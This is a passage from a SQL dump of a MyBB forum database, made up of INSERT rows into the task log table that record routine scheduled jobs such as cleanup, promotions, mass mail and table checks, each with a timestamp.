mybb_tasklog VALUES('14926', '1', '1352154782', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14927', '5', '1352154791', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14928', '7', '1352154789', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('14929', '9', '1352155269', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14930', '5', '1352155568', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14931', '9', '1352156135', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14932', '3', '1352156995', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14933', '1', '1352156997', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14934', '7', '1352156999', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('14935', '5', '1352157100', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14936', '9', '1352157111', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14937', '5', '1352158386', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14938', '9', '1352158420', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14939', '3', '1352158424', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14940', '9', '1352158883', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14941', '5', '1352159124', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14942', '9', '1352159997', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14943', '3', '1352160005', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14944', '1', '1352160014', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14945', '2', '1352160022', 'The daily cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14946', '7', '1352160089', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('14947', '11', '1352160091', 'The delayed moderation task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14948', '5', '1352160742', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14949', '9', '1352161101', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14950', '5', '1352161623', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14951', '9', '1352162131', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14952', '3', '1352162216', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14953', '9', '1352162663', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14954', '5', '1352162804', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14955', '9', '1352163471', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14956', '3', '1352163785', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14957', '1', '1352163865', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14958', '7', '1352163888', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('14959', '5', '1352163951', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14960', '9', '1352164356', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14961', '5', '1352165265', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14962', '9', '1352165398', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14963', '3', '1352165402', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14964', '9', '1352166320', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14965', '5', '1352166389', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14966', '9', '1352167065', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14967', '3', '1352167301', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14968', '1', '1352167327', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14969', '7', '1352167380', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('14970', '5', '1352167505', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14971', '9', '1352167876', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14972', '5', '1352168827', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14973', '9', '1352169129', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14974', '3', '1352169146', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14975', '9', '1352170107', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14976', '5', '1352170180', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14977', '9', '1352172121', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14978', '3', '1352172123', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14979', '1', '1352172145', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14980', '7', '1352172147', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('14981', '5', '1352172224', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14982', '5', '1352172301', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14983', '9', '1352172320', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14984', '3', '1352174089', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14985', '9', '1352174748', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14986', '5', '1352174757', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14987', '3', '1352174763', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14988', '1', '1352175382', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14989', '7', '1352175393', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('14990', '9', '1352175432', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14991', '5', '1352176220', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14992', '9', '1352176233', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14993', '3', '1352176234', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14994', '9', '1352177085', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14995', '5', '1352177145', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14996', '9', '1352178087', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14997', '3', '1352178098', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14998', '1', '1352178100', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('14999', '7', '1352178198', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15000', '5', '1352178320', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15001', '9', '1352178710', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15002', '5', '1352179643', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15003', '9', '1352179796', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15004', '3', '1352180004', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15005', '9', '1352180420', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15006', '5', '1352180704', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15007', '9', '1352181456', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15008', '3', '1352181546', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15009', '1', '1352181618', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15010', '7', '1352181619', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15011', '5', '1352182066', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15012', '9', '1352182326', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15013', '5', '1352183375', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15014', '9', '1352183615', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15015', '3', '1352183783', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15016', '9', '1352184812', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15017', '5', '1352185227', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15018', '9', '1352185256', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15019', '3', '1352185260', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15020', '1', '1352185362', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15021', '7', '1352185429', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15022', '5', '1352185522', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15023', '9', '1352185838', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15024', '5', '1352186796', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15025', '9', '1352186813', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15026', '3', '1352188884', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15027', '9', '1352189086', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15028', '5', '1352189189', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15029', '1', '1352189211', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15030', '7', '1352189227', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15031', '9', '1352189807', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15032', '5', '1352190300', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15033', '9', '1352190313', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15034', '3', '1352191539', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15035', '9', '1352191696', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15036', '5', '1352191705', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15037', '9', '1352192806', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15038', '3', '1352192992', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15039', '1', '1352192997', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15040', '7', '1352193033', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15041', '5', '1352193747', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15042', '9', '1352193783', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15043', '5', '1352194911', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15044', '9', '1352195109', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15045', '3', '1352195125', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15046', '5', '1352195134', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15047', '9', '1352195745', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15048', '3', '1352196032', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15049', '1', '1352196072', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15050', '7', '1352196078', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15051', '5', '1352197358', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15052', '9', '1352197484', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15053', '5', '1352199006', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15054', '9', '1352199027', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15055', '3', '1352199218', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15056', '9', '1352200828', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15057', '3', '1352200864', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15058', '1', '1352200891', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15059', '7', '1352200931', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15060', '5', '1352200979', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15061', '5', '1352201134', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15062', '9', '1352201146', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15063', '3', '1352203284', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15064', '9', '1352203395', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15065', '5', '1352203450', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15066', '1', '1352203462', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15067', '7', '1352203513', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15068', '5', '1352203553', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15069', '9', '1352205408', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15070', '5', '1352205434', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15071', '3', '1352205438', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15072', '9', '1352205850', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15073', '5', '1352206567', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15074', '9', '1352206593', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15075', '3', '1352206755', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15076', '1', '1352206875', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15077', '7', '1352206879', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15078', '5', '1352207149', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15079', '9', '1352207713', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15080', '5', '1352208314', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15081', '9', '1352209519', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15082', '3', '1352209614', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15083', '5', '1352209628', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15084', '9', '1352211550', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15085', '3', '1352211661', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15086', '1', '1352211694', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15087', '7', '1352211700', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15088', '5', '1352212120', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15089', '9', '1352212188', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15090', '3', '1352213377', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15091', '9', '1352214869', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15092', '5', '1352215185', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15093', '3', '1352215212', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15094', '1', '1352215221', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15095', '7', '1352215225', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15096', '5', '1352215946', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15097', '9', '1352215967', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15098', '3', '1352215983', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15099', '9', '1352216638', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15100', '5', '1352216715', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15101', '9', '1352217861', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15102', '3', '1352218490', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15103', '1', '1352219263', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15104', '7', '1352219290', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15105', '5', '1352220912', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15106', '9', '1352220920', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15107', '3', '1352220957', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15108', '3', '1352221330', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15109', '1', '1352221364', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15110', '7', '1352222268', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15111', '5', '1352222619', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15112', '9', '1352223636', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15113', '5', '1352223664', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15114', '3', '1352224154', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15115', '5', '1352224494', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15116', '9', '1352224521', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15117', '3', '1352225151', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15118', '1', '1352225201', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15119', '7', '1352226146', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15120', '5', '1352226604', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15121', '9', '1352227008', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15122', '3', '1352227020', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15123', '9', '1352227719', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15124', '5', '1352227760', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15125', '9', '1352228269', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15126', '3', '1352228517', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15127', '1', '1352228542', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15128', '7', '1352228567', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15129', '5', '1352228716', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15130', '9', '1352229156', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15131', '5', '1352230235', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15132', '9', '1352230263', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15133', '3', '1352230329', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15134', '9', '1352231846', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15135', '5', '1352233860', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15136', '3', '1352233885', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15137', '1', '1352235869', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15138', '7', '1352235876', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15139', '9', '1352235941', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15140', '5', '1352236019', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15141', '3', '1352236047', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15142', '9', '1352236234', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15143', '5', '1352237491', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15144', '9', '1352237500', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15145', '3', '1352237942', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15146', '9', '1352238969', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15147', '5', '1352239218', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15148', '3', '1352239725', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15149', '1', '1352239748', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15150', '7', '1352240109', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15151', '5', '1352240120', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15152', '9', '1352240128', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15153', '5', '1352241205', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15154', '9', '1352241237', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15155', '3', '1352241690', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15156', '9', '1352241857', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15157', '5', '1352241924', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15158', '9', '1352243115', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15159', '3', '1352243299', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15160', '1', '1352243326', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15161', '7', '1352243343', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15162', '5', '1352243346', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15163', '9', '1352243573', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15164', '5', '1352244343', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15165', '9', '1352244382', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15166', '3', '1352245647', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15167', '9', '1352245657', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15168', '5', '1352245894', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15169', '9', '1352246979', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15170', '3', '1352247710', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15171', '1', '1352248112', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15172', '2', '1352248142', 'The daily cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15173', '7', '1352248149', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15174', '11', '1352248251', 'The delayed moderation task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15175', '5', '1352248262', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15176', '9', '1352248341', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15177', '3', '1352248427', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15178', '9', '1352248824', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15179', '5', '1352249101', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15180', '9', '1352252260', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15181', '3', '1352252322', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15182', '1', '1352252488', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15183', '7', '1352252500', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15184', '5', '1352252514', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15185', '9', '1352253041', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15186', '5', '1352253062', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15187', '9', '1352253395', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15188', '3', '1352253541', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15189', '1', '1352253670', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15190', '7', '1352253676', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15191', '5', '1352253922', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15192', '9', '1352254238', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15193', '5', '1352255115', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15194', '9', '1352255131', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15195', '3', '1352255632', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15196', '9', '1352256336', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15197', '5', '1352256339', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15198', '9', '1352257123', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15199', '3', '1352257174', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15200', '1', '1352257325', 'The hourly cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15201', '7', '1352257330', 'Notice: The check tables task successfully ran and repaired the lthackin_joker.mybb_username_history, lthackin_joker.mybb_username_history table(s).'); INSERT INTO mybb_tasklog VALUES('15202', '5', '1352257503', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15203', '9', '1352257834', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15204', '5', '1352258700', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15205', '9', '1352258708', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15206', '3', '1352259026', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15207', '9', '1352259708', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15208', '5', '1352259901', 'The promotions task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15209', '9', '1352260520', 'The mass mail task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15210', '3', '1352261697', 'The user cleanup task successfully ran.'); INSERT INTO mybb_tasklog VALUES('15211', '1', '1352261874', 